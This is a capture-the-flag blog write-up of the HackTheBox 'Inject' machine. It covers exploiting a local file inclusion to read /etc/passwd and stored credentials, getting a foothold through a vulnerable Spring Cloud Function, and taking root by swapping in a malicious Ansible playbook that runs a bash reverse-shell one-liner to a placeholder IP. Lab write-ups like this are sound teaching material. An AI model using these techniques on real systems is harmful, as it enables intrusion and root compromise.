HackTheBox: Inject write-up

In this post we’ll take a look at the solution to the Inject challenge on HackTheBox. The solution involves abusing an LFI vulnerability and exploiting a misconfigured service to obtain root privileges. The difficulty for this challenge is Easy.

Enumeration

We start the challenge by scanning the machine with Rustscan. We have two services running: SSH on the standard port 22 and a web server on port 8080. We also learn that we are dealing with an Ubuntu server. Since we don’t have any credentials yet let’s take a look at the web application.

After poking around we find that the application offers an image upload service. There is a file filter which rejects non-image files based on the file extension. Although the filter is very easy to bypass by changing the file extension, I did not find any obvious way to exploit it and get a reverse shell.

I noticed that after a successful upload the image is available by visiting the URL /show_image?img=imagename.jpg where the file name is passed as a parameter. This parameter might be abused to include any file that is locally present on the machine. To test this I tried to display the debian logo (which should be present on the machine as it is running Ubuntu) found by default in /usr/share/pixmaps/debian-logo.png:

Nice, we can take a look at the local filesystem. Let’s open this request in Burp Suite Repeater and see if we can access the /etc/passwd file. Surprise, surprise – we can:

I found that the same ‘img’ parameter could be used to get a listing if I specified a directory. Very conveniently we can also see all the hidden directories in this way. Taking this route, I “navigated” to the ‘/home’ directory which yielded a list of users on the machine, specifically two users named phil and frank. Inside frank‘s home directory I also noticed an interesting file in /home/frank/.m2/settings.xml which contained some credentials:

<?xml version="1.0" encoding="UTF-8"?>
<settings xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
  <servers>
    <server>
      <id>Inject</id>
      <username>phil</username>
      <password>[REDACTED PASSWORD]</password>
      <privateKey>${user.home}/.ssh/id_dsa</privateKey>
      <filePermissions>660</filePermissions>
      <directoryPermissions>660</directoryPermissions>
      <configuration></configuration>
    </server>
  </servers>
</settings>

Trying to use these credentials to get an SSH session did not work. As I explored more I stumbled upon /var/www/WebApp/pom.xml which contained more valuable information:

...
<dependency>
<groupId>org.springframework.cloud</groupId>
<artifactId>spring-cloud-function-web</artifactId>
<version>3.2.2</version>
</dependency>
...

Initial foothold and user flag

It looks like an outdated and potentially vulnerable version of the Spring Cloud Framework is in use (more information here). We can abuse it to gain a remote shell with Metasploit, using the module multi/http/spring_cloud_function_spel_injection:

We got access to the machine as frank. I proceeded to scan the machine with Linpeas which suggested that the machine might be vulnerable to CVE-2021-3560 and CVE-2022-2588. Unfortunately that was not really the case.

I started pspy next which revealed some interesting information:

It looks like Ansible Playbooks is running on the machine and executes the playbook_1.yml playbook found in the /opt/automation directory. This looks interesting, let’s investigate further:

ls -alh /opt/automation	
total 12K
drwxr-xr-x 3 root root  4.0K Oct 20  2022 .
drwxr-xr-x 3 root root  4.0K Oct 20  2022 ..
drwxrwxr-x 2 root staff 4.0K May 29 19:08 tasks

ls -alh /opt/automation/tasks
total 12K
drwxrwxr-x 2 root staff 4.0K May 29 19:10 .
drwxr-xr-x 3 root root  4.0K Oct 20  2022 ..
-rw-r--r-- 1 root root   150 May 29 19:10 playbook_1.yml

Currently we don’t have write permissions to mess with the playbook file. Remember the credentials we found earlier? Turns out we can become phil (and get the user flag!). Also notice that phil is in the staff group:

id phil
uid=1001(phil) gid=1001(phil) groups=1001(phil),50(staff)

Root flag

As phil we can’t directly edit the playbook_1.yml file however nothing is there to stop us from deleting it and creating our own customized version of it.

For example we can get a reverse root shell on the box. To do so let’s first create a reverse shell script on our local machine with the following content:

/bin/bash -i >& /dev/tcp/[OUR IP]/[PORT] 0>&1

We will also need a custom version of playbook_1.yml file:

- hosts: localhost
  tasks:
  - name: Pwn the box
    command: sudo bash /tmp/revshell.sh

We can upload both files to the target box, move the bash script to /tmp/revshell.sh and playbook_1.yml to /opt/automation/tasks (remembering to delete the original playbook file and adding the execution permission to the shell script with chmod).

All that’s left to do is to open a netcat listener on our box and get the root flag.

In the cyber world, coffee is the potion of champions. Support my efforts by offering me a virtual cup through 'Buy Me a Coffee'! Let's unravel the enigmas of CTF challenges and fortify our cyber arsenals together!

2 thoughts on “HackTheBox: Inject write-up”

  1. great post! ur explanation of the box was really helpful. stuck for ages before this, so thanks!

Leave a reply

Your email address will not be published. Required fields are marked *